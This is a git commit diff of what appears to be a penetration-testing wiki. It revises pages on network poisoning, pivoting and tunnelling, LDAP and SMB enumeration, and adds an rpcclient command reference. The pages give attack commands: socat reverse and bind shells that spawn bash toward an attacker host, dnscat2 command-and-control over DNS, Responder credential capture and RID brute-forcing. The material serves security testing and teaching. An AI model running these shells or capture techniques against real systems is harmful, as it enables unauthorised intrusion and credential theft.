GitBook: [#3557] No subject

This commit is contained in:
CPol 2022-10-04 21:36:29 +00:00 committed by gitbook-bot
parent 268cbcac27
commit 7b6ebc21a9
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
10 changed files with 274 additions and 117 deletions

View file

@ -364,7 +364,8 @@
* [123/udp - Pentesting NTP](network-services-pentesting/pentesting-ntp.md) * [123/udp - Pentesting NTP](network-services-pentesting/pentesting-ntp.md)
* [135, 593 - Pentesting MSRPC](network-services-pentesting/135-pentesting-msrpc.md) * [135, 593 - Pentesting MSRPC](network-services-pentesting/135-pentesting-msrpc.md)
* [137,138,139 - Pentesting NetBios](network-services-pentesting/137-138-139-pentesting-netbios.md) * [137,138,139 - Pentesting NetBios](network-services-pentesting/137-138-139-pentesting-netbios.md)
* [139,445 - Pentesting SMB](network-services-pentesting/pentesting-smb.md) * [139,445 - Pentesting SMB](network-services-pentesting/pentesting-smb/README.md)
* [rpcclient enumeration](network-services-pentesting/pentesting-smb/rpcclient-enumeration.md)
* [143,993 - Pentesting IMAP](network-services-pentesting/pentesting-imap.md) * [143,993 - Pentesting IMAP](network-services-pentesting/pentesting-imap.md)
* [161,162,10161,10162/udp - Pentesting SNMP](network-services-pentesting/pentesting-snmp/README.md) * [161,162,10161,10162/udp - Pentesting SNMP](network-services-pentesting/pentesting-snmp/README.md)
* [Cisco SNMP](network-services-pentesting/pentesting-snmp/cisco-snmp.md) * [Cisco SNMP](network-services-pentesting/pentesting-snmp/cisco-snmp.md)

View file

@ -138,7 +138,7 @@ You won't be able to intercept NTLM hashes (normally), but you can easily grab s
The **logs and the challenges** of default _**Responder**_ installation in kali can be found in `/usr/share/responder/logs` The **logs and the challenges** of default _**Responder**_ installation in kali can be found in `/usr/share/responder/logs`
### DHCP Poisoning #### Responder - DHCP Poisoning
Windows uses several custom DHCP options such as NetBIOS, WINS, WPAD settings. When a workstation sends a DHCP request to get its networking settings, these additional settings can be included in the DHCP answer to facilitate straightforward connectivity and name resolution. Windows uses several custom DHCP options such as NetBIOS, WINS, WPAD settings. When a workstation sends a DHCP request to get its networking settings, these additional settings can be included in the DHCP answer to facilitate straightforward connectivity and name resolution.
@ -152,7 +152,7 @@ However, spoofing DHCP answers has unique benefits. **It's definitely stealthier
./Responder.py -I eth0 -Pdv ./Responder.py -I eth0 -Pdv
``` ```
### Capturing credentials #### Responder - Capturing credentials
Responder is going to **impersonate all the service using the mentioned protocols**. Once some user try to access a service being resolved using those protocols, **he will try to authenticate against Responde**r and Responder will be able to **capture** the "credentials" (most probably a **NTLMv2 Challenge/Response**): Responder is going to **impersonate all the service using the mentioned protocols**. Once some user try to access a service being resolved using those protocols, **he will try to authenticate against Responde**r and Responder will be able to **capture** the "credentials" (most probably a **NTLMv2 Challenge/Response**):
@ -164,11 +164,23 @@ It is possible to try to downgrade to NetNTLMv1 or to try to disable ESS.
> Inveigh is a PowerShell ADIDNS/LLMNR/NBNS/mDNS/DNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system. > Inveigh is a PowerShell ADIDNS/LLMNR/NBNS/mDNS/DNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system.
[**Inveigh** ](https://github.com/Kevin-Robertson/Inveigh)was a PowerShell script, now it's a C# binary that has the same main features as Responder.\ [**Inveigh** ](https://github.com/Kevin-Robertson/Inveigh)was a PowerShell script, now it's a C# binary that has the same main features as Responder. There is a [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters) **** that lists all parameters and usage instructions.\
Another version can be found in [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero). Another version can be found in [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero).
![](../../.gitbook/assets/45662029-1b5e6300-bace-11e8-8180-32f8d377d48b.png) ![](../../.gitbook/assets/45662029-1b5e6300-bace-11e8-8180-32f8d377d48b.png)
Or run it with more options:
```powershell
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
```
Or run the C# version:
```bash
Inveigh.exe
```
## NTML Relay Attack ## NTML Relay Attack
This attack relays **SMB authentication sessions** on an internal network to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**. Please, note that the relayed authentication must be from a **user which has Local Admin access to the relayed** host and **SMB signing must be disabled**. This attack relays **SMB authentication sessions** on an internal network to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**. Please, note that the relayed authentication must be from a **user which has Local Admin access to the relayed** host and **SMB signing must be disabled**.

View file

@ -202,22 +202,6 @@ rportfwd_local [bind port] [forward host] [forward port]
rportfwd_local stop [bind port] rportfwd_local stop [bind port]
``` ```
## Windows netsh
### Port2Port
You need to be a local admin (for any port)
```bash
netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp
# Example:
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=4444 connectaddress=10.10.10.10 connectport=4444
# Check the port forward was created:
netsh interface portproxy show v4tov4
# Delete port forward
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=4444
```
## reGeorg ## reGeorg
[https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg) [https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg)
@ -236,16 +220,19 @@ You need to use the **same version for client and server**
### socks ### socks
```bash ```bash
./chisel server -p 8080 --reverse #Server ./chisel server -p 8080 --reverse #Server -- Attacker
./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client ./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client -- Victim
#And now you can use proxychains with port 1080 (default) #And now you can use proxychains with port 1080 (default)
./chisel server -v -p 8080 --socks5 #Server -- Victim (needs to have port 8080 exposed)
./chisel client -v 10.10.10.10:8080 socks #Attacker
``` ```
### Port forwarding ### Port forwarding
```bash ```bash
./chisel_1.7.6_linux_amd64 server -p 12312 --reverse ./chisel_1.7.6_linux_amd64 server -p 12312 --reverse #Server -- Attacker
./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505 ./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505 #Client -- Victim
``` ```
## Rpivot ## Rpivot
@ -281,7 +268,7 @@ victim> python client.py --server-ip <rpivot_server_ip> --server-port 9999 --ntl
```bash ```bash
victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337 attacker> socat FILE:`tty`,raw,echo=0 TCP4:<victim_ip>:1337
``` ```
### Reverse shell ### Reverse shell
@ -294,13 +281,13 @@ victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
### Port2Port ### Port2Port
```bash ```bash
socat TCP-LISTEN:<lport>,fork TCP:<redirect_ip>:<rport> & socat TCP4-LISTEN:<lport>,fork TCP4:<redirect_ip>:<rport> &
``` ```
### Port2Port through socks ### Port2Port through socks
```bash ```bash
socat TCP-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678 socat TCP4-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678
``` ```
### Meterpreter through SSL Socat ### Meterpreter through SSL Socat
@ -364,6 +351,53 @@ echo y | plink.exe -l <Our_valid_username> -pw <valid_password> [-p <port>] -R <
echo y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090 echo y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090
``` ```
## Windows netsh
### Port2Port
You need to be a local admin (for any port)
```bash
netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp
# Example:
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=4444 connectaddress=10.10.10.10 connectport=4444
# Check the port forward was created:
netsh interface portproxy show v4tov4
# Delete port forward
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=4444
```
## SocksOverRDP & Proxifier
You need to have **RDP access over the system**.\
Download:
1. [SocksOverRDP x64 Binaries](https://github.com/nccgroup/SocksOverRDP/releases) - This tool uses `Dynamic Virtual Channels` (`DVC`) from the Remote Desktop Service feature of Windows. DVC is responsible for **tunneling packets over the RDP connection**.
2. [Proxifier Portable Binary](https://www.proxifier.com/download/#win-tab)
In your client computer load **`SocksOverRDP-Plugin.dll`** like this:
```bash
# Load SocksOverRDP.dll using regsvr32.exe
C:\SocksOverRDP-x64> regsvr32.exe SocksOverRDP-Plugin.dll
```
Now we can **connect** to the **victim** over **RDP** using **`mstsc.exe`**, and we should receive a **prompt** saying that the **SocksOverRDP plugin is enabled**, and it will **listen** on **127.0.0.1:1080**.
**Connect** via **RDP** and upload & execute in the victim machine the **`SocksOverRDP-Server.exe` ** binary:
```
C:\SocksOverRDP-x64> SocksOverRDP-Server.exe
```
Now, confirm in you machine (attacker) that the port 1080 is listening:
```
netstat -antb | findstr 1080
```
Now you can use [**Proxifier**](https://www.proxifier.com/) **to proxy the traffic through that port.**
## Proxify Windows GUI Apps ## Proxify Windows GUI Apps
You can make Windows GUI apps navigate through a proxy using [**Proxifier**](https://www.proxifier.com/).\ You can make Windows GUI apps navigate through a proxy using [**Proxifier**](https://www.proxifier.com/).\
@ -423,14 +457,29 @@ ssh <user>@1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080
### DNSCat2 ### DNSCat2
****[**Download it from here**](https://github.com/iagox86/dnscat2)**.**
Establishes a C\&C channel through DNS. It doesn't need root privileges. Establishes a C\&C channel through DNS. It doesn't need root privileges.
```bash ```bash
attacker> ruby ./dnscat2.rb tunneldomain.com attacker> ruby ./dnscat2.rb tunneldomain.com
victim> ./dnscat2 tunneldomain.com victim> ./dnscat2 tunneldomain.com
# If using it in an internal network for a CTF:
attacker> ruby dnscat2.rb --dns host=10.10.10.10,port=53,domain=mydomain.local --no-cache
victim> ./dnscat2 --dns host=10.10.10.10,port=5353
``` ```
**Port forwarding with dnscat** #### **In PowerShell**
You can use [**dnscat2-powershell**](https://github.com/lukebaggett/dnscat2-powershell) to run a dnscat2 client in powershell:
```
Import-Module .\dnscat2.ps1
Start-Dnscat2 -DNSserver 10.10.10.10 -Domain mydomain.local -PreSharedSecret somesecret -Exec cmd
```
#### **Port forwarding with dnscat**
```bash ```bash
session -i <sessions_id> session -i <sessions_id>
@ -460,11 +509,28 @@ Root is needed in both systems to create tun adapters and tunnel data between th
ping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.100 ping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.100
``` ```
### ptunnel-ng
****[**Download it from here**](https://github.com/utoni/ptunnel-ng.git).
```bash
# Generate it
sudo ./autogen.sh
# Server -- victim (needs to be able to receive ICMP)
sudo ptunnel-ng
# Client - Attacker
sudo ptunnel-ng -p <server_ip> -l <listen_port> -r <dest_ip> -R <dest_port>
# Try to connect with SSH through ICMP tunnel
ssh -p 2222 -l user 127.0.0.1
# Create a socks proxy through the SSH connection through the ICMP tunnel
ssh -D 9050 -p 2222 -l user 127.0.0.1
```
## Other tools to check ## Other tools to check
* [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf) * [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf)
* [https://github.com/z3APA3A/3proxy](https://github.com/z3APA3A/3proxy) * [https://github.com/z3APA3A/3proxy](https://github.com/z3APA3A/3proxy)
* [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel)
<details> <details>

View file

@ -142,7 +142,7 @@ u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
Example taken from: [https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/](https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/) Example taken from: [https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/](https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/)
## Clear text credentials ## Sniff clear text credentials
If LDAP is used without SSL you can **sniff credentials in plain text** in the network. If LDAP is used without SSL you can **sniff credentials in plain text** in the network.
@ -150,7 +150,9 @@ Also, you can perform a **MITM** attack in the network **between the LDAP server
**If SSL is used** you can try to make **MITM** like the mentioned above but offering a **false certificate**, if the **user accepts it**, you are able to Downgrade the authentication method and see the credentials again. **If SSL is used** you can try to make **MITM** like the mentioned above but offering a **false certificate**, if the **user accepts it**, you are able to Downgrade the authentication method and see the credentials again.
## Bypass TLS SNI check ## Anonymous Access
### Bypass TLS SNI check
According to [**this writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) just by accessing the LDAP server with an arbitrary domain name (like company.com) he was able to contact the LDAP service and extract information as an anonymous user: According to [**this writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) just by accessing the LDAP server with an arbitrary domain name (like company.com) he was able to contact the LDAP service and extract information as an anonymous user:
@ -158,6 +160,11 @@ According to [**this writeup**](https://swarm.ptsecurity.com/exploiting-arbitrar
ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" + ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
``` ```
### LDAP anonymous binds
[LDAP anonymous binds](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) allow **unauthenticated attackers** to retrieve information from the domain, such as a complete listing of users, groups, computers, user account attributes, and the domain password policy. This is a **legacy configuration**, and as of Windows Server 2003, only authenticated users are permitted to initiate LDAP requests. \
However, admins may have needed to **set up a particular application to allow anonymous binds** and given out more than the intended amount of access, thereby giving unauthenticated users access to all objects in AD.
## Valid Credentials ## Valid Credentials
If you have valid credentials to login into the LDAP server, you can dump all the information about the Domain Admin using: If you have valid credentials to login into the LDAP server, you can dump all the information about the Domain Admin using:

View file

@ -51,7 +51,7 @@ With an anonymous null session you can access the IPC$ share and interact with s
## What is NTLM ## What is NTLM
If you don't know what is NTLM or you want to know how it works and how to abuse it, you will find very insteresting this page about [**NTLM** where is explained **how this protocol works and how you can take advantage of it**](../windows-hardening/ntlm/). If you don't know what is NTLM or you want to know how it works and how to abuse it, you will find very insteresting this page about [**NTLM** where is explained **how this protocol works and how you can take advantage of it**](../../windows-hardening/ntlm/).
## **Enumeration** ## **Enumeration**
@ -66,7 +66,7 @@ nbtscan -r 192.168.0.1/24
To look for possible exploits to the SMB version it important to know which version is being used. If this information does not appear in other used tools, you can: To look for possible exploits to the SMB version it important to know which version is being used. If this information does not appear in other used tools, you can:
* Use the **MSF** auxiliary module \_**auxiliary/scanner/smb/smb\_version** * Use the **MSF** auxiliary module \_**auxiliary/scanner/smb/smb\_version**
* \_Or\*\* this script\*\*: * Or this script:
```bash ```bash
#!/bin/sh #!/bin/sh
@ -127,80 +127,23 @@ rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbff
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address> /usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
``` ```
### **Enumerating LSARPC and SAMR rpcclient** ### Enumerate Users
**Pat of this section was extracted from book "**_**Network Security Assesment 3rd Edition**_**"**
You can use the Samba **`rpcclient`** utility to interact with **RPC endpoints via named pipes**. The following lists commands that you can issue to SAMR, LSARPC, and LSARPC-DS interfaces upon **establishing** a **SMB session** (often requiring credentials).
#### Server Info
* **Server Info**: `srvinfo`
#### Users enumeration
* **List users**: `querydispinfo` and `enumdomusers`
* **Get user details**: `queryuser <0xrid>`
* **Get user groups**: `queryusergroups <0xrid>`
* **GET SID of a user**: `lookupnames <username>`
* **Get users aliases**: `queryuseraliases [builtin|domain] <sid>`
```bash ```bash
# Brute-Force users RIDs # This info should alerady being gathered from enum4linux and enum4linux-ng
for i in $(seq 500 1100); do crackmapexec smb 10.10.10.10 --users
rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";
done
# You can also use samrdump.py for this purpose ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "
rpcclient -U "" -N 10.10.10.10
enumdomusers
``` ```
#### Groups enumeration ### **Enumerating LSARPC and SAMR rpcclient**
* **List groups**: `enumdomgroups` {% content-ref url="rpcclient-enumeration.md" %}
* **Get group details**: `querygroup <0xrid>` [rpcclient-enumeration.md](rpcclient-enumeration.md)
* **Get group members**: `querygroupmem <0xrid>` {% endcontent-ref %}
#### Aliasgroups enumeration
* **List alias**: `enumalsgroups <builtin|domain>`
* **Get members**: `queryaliasmem builtin|domain <0xrid>`
#### Domains enumeration
* **List domains**: `enumdomains`
* **Get SID**: `lsaquery`
* **Domain info**: `querydominfo`
#### Shares enumeration
* **Enumerate all available shares**: `netshareenumall`
* **Info about a share**: `netsharegetinfo <share>`
#### More SIDs
* **Find SIDs by name**: `lookupnames <username>`
* **Find more SIDs**: `lsaenumsid`
* **RID cycling (check more SIDs)**: `lookupsids <sid>`
#### **Extra commands**
| **Command** | **Interface** | **Description** |
| ------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------- |
| queryuser | SAMR | Retrieve user information |
| querygroup | Retrieve group information | |
| querydominfo | Retrieve domain information | |
| enumdomusers | Enumerate domain users | |
| enumdomgroups | Enumerate domain groups | |
| createdomuser | Create a domain user | |
| deletedomuser | Delete a domain user | |
| lookupnames | LSARPC | Look up usernames to SID[a](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn8) values |
| lookupsids | Look up SIDs to usernames (RID[b](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn9) cycling) | |
| lsaaddacctrights | Add rights to a user account | |
| lsaremoveacctrights | Remove rights from a user account | |
| dsroledominfo | LSARPC-DS | Get primary domain information |
| dsenumdomtrusts | Enumerate trusted domains within an AD forest | |
To **understand** better how the tools _**samrdump**_ **and** _**rpcdump**_ works you should read [**Pentesting MSRPC**](135-pentesting-msrpc.md).
### GUI connection from linux ### GUI connection from linux
@ -410,10 +353,10 @@ crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
``` ```
### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md) ### [**psexec**](../../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../../windows-hardening/ntlm/smbexec.md)
Both options will **create a new service** (using _\pipe\svcctl_ via SMB) in the victim machine and use it to **execute something** (**psexec** will **upload** an executable file to ADMIN$ share and **smbexec** will point to **cmd.exe/powershell.exe** and put in the arguments the payload --**file-less technique-**-).\ Both options will **create a new service** (using _\pipe\svcctl_ via SMB) in the victim machine and use it to **execute something** (**psexec** will **upload** an executable file to ADMIN$ share and **smbexec** will point to **cmd.exe/powershell.exe** and put in the arguments the payload --**file-less technique-**-).\
**More info** about [**psexec** ](../windows-hardening/ntlm/psexec-and-winexec.md)and [**smbexec**](../windows-hardening/ntlm/smbexec.md).\ **More info** about [**psexec** ](../../windows-hardening/ntlm/psexec-and-winexec.md)and [**smbexec**](../../windows-hardening/ntlm/smbexec.md).\
In **kali** it is located on /usr/share/doc/python3-impacket/examples/ In **kali** it is located on /usr/share/doc/python3-impacket/examples/
```bash ```bash
@ -426,7 +369,7 @@ psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass
Using **parameter**`-k` you can authenticate against **kerberos** instead of **NTLM** Using **parameter**`-k` you can authenticate against **kerberos** instead of **NTLM**
### [wmiexec](../windows-hardening/ntlm/wmicexec.md)/dcomexec ### [wmiexec](../../windows-hardening/ntlm/wmicexec.md)/dcomexec
Stealthily execute a command shell without touching the disk or running a new service using DCOM via **port 135.**\ Stealthily execute a command shell without touching the disk or running a new service using DCOM via **port 135.**\
In **kali** it is located on /usr/share/doc/python3-impacket/examples/ In **kali** it is located on /usr/share/doc/python3-impacket/examples/
@ -447,7 +390,7 @@ Using **parameter**`-k` you can authenticate against **kerberos** instead of **N
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted #You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
``` ```
### [AtExec](../windows-hardening/ntlm/atexec.md) ### [AtExec](../../windows-hardening/ntlm/atexec.md)
Execute commands via the Task Scheduler (using _\pipe\atsvc_ via SMB).\ Execute commands via the Task Scheduler (using _\pipe\atsvc_ via SMB).\
In **kali** it is located on /usr/share/doc/python3-impacket/examples/ In **kali** it is located on /usr/share/doc/python3-impacket/examples/
@ -473,7 +416,7 @@ ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rid
## SMB relay attack ## SMB relay attack
This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.\ This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.\
[**More information about this attack here.**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) [**More information about this attack here.**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
## SMB-Trap ## SMB-Trap
@ -488,17 +431,17 @@ This happens with the functions:
Which are used by some browsers and tools (like Skype) Which are used by some browsers and tools (like Skype)
![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (93).png>) ![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../.gitbook/assets/image (93).png>)
### SMBTrap using MitMf ### SMBTrap using MitMf
![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (94).png>) ![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../.gitbook/assets/image (94).png>)
## NTLM Theft ## NTLM Theft
Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can illicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an [SMB relay attack](pentesting-smb.md#smb-relay-attack). Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can illicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an [SMB relay attack](./#smb-relay-attack).
[See: ntlm\_theft](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft) [See: ntlm\_theft](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft)
## HackTricks Automatic Commands ## HackTricks Automatic Commands

View file

@ -0,0 +1,98 @@
# rpcclient enumeration
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>
**Pat of this section was extracted from book "**_**Network Security Assesment 3rd Edition**_**"**
You can use the Samba **`rpcclient`** utility to interact with **RPC endpoints via named pipes**. The following lists commands that you can issue to SAMR, LSARPC, and LSARPC-DS interfaces upon **establishing** a **SMB session** (often requiring credentials).
#### Server Info
* **Server Info**: `srvinfo`
#### Users enumeration
* **List users**: `querydispinfo` and `enumdomusers`
* **Get user details**: `queryuser <0xrid>`
* **Get user groups**: `queryusergroups <0xrid>`
* **GET SID of a user**: `lookupnames <username>`
* **Get users aliases**: `queryuseraliases [builtin|domain] <sid>`
```bash
# Brute-Force users RIDs
for i in $(seq 500 1100); do
rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";
done
# You can also use samrdump.py for this purpose
```
#### Groups enumeration
* **List groups**: `enumdomgroups`
* **Get group details**: `querygroup <0xrid>`
* **Get group members**: `querygroupmem <0xrid>`
#### Aliasgroups enumeration
* **List alias**: `enumalsgroups <builtin|domain>`
* **Get members**: `queryaliasmem builtin|domain <0xrid>`
#### Domains enumeration
* **List domains**: `enumdomains`
* **Get SID**: `lsaquery`
* **Domain info**: `querydominfo`
#### Shares enumeration
* **Enumerate all available shares**: `netshareenumall`
* **Info about a share**: `netsharegetinfo <share>`
#### More SIDs
* **Find SIDs by name**: `lookupnames <username>`
* **Find more SIDs**: `lsaenumsid`
* **RID cycling (check more SIDs)**: `lookupsids <sid>`
#### **Extra commands**
| **Command** | **Interface** | **Description** |
| ------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------- |
| queryuser | SAMR | Retrieve user information |
| querygroup | Retrieve group information | |
| querydominfo | Retrieve domain information | |
| enumdomusers | Enumerate domain users | |
| enumdomgroups | Enumerate domain groups | |
| createdomuser | Create a domain user | |
| deletedomuser | Delete a domain user | |
| lookupnames | LSARPC | Look up usernames to SID[a](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn8) values |
| lookupsids | Look up SIDs to usernames (RID[b](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn9) cycling) | |
| lsaaddacctrights | Add rights to a user account | |
| lsaremoveacctrights | Remove rights from a user account | |
| dsroledominfo | LSARPC-DS | Get primary domain information |
| dsenumdomtrusts | Enumerate trusted domains within an AD forest | |
To **understand** better how the tools _**samrdump**_ **and** _**rpcdump**_ works you should read [**Pentesting MSRPC**](../135-pentesting-msrpc.md).
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>

View file

@ -60,10 +60,20 @@ If you just have access to an AD environment but you don't have any credentials/
* `enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>` * `enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>`
* `smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>` * `smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>`
* `smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //` * `smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //`
* [**A more detailed guide on how to enumerate a SMB server can be found here.**](../../network-services-pentesting/pentesting-smb.md) * A more detailed guide on how to enumerate a SMB server can be found here:
{% content-ref url="../../network-services-pentesting/pentesting-smb/" %}
[pentesting-smb](../../network-services-pentesting/pentesting-smb/)
{% endcontent-ref %}
* **Enumerate Ldap** * **Enumerate Ldap**
* `nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>` * `nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>`
* [**A more detailed guide on how to enumerate LDAP can be found here.**](../../network-services-pentesting/pentesting-ldap.md) * A more detailed guide on how to enumerate LDAP can be found here (pay **special attention to the anonymous access**):
{% content-ref url="../../network-services-pentesting/pentesting-ldap.md" %}
[pentesting-ldap.md](../../network-services-pentesting/pentesting-ldap.md)
{% endcontent-ref %}
* **Poison the network** * **Poison the network**
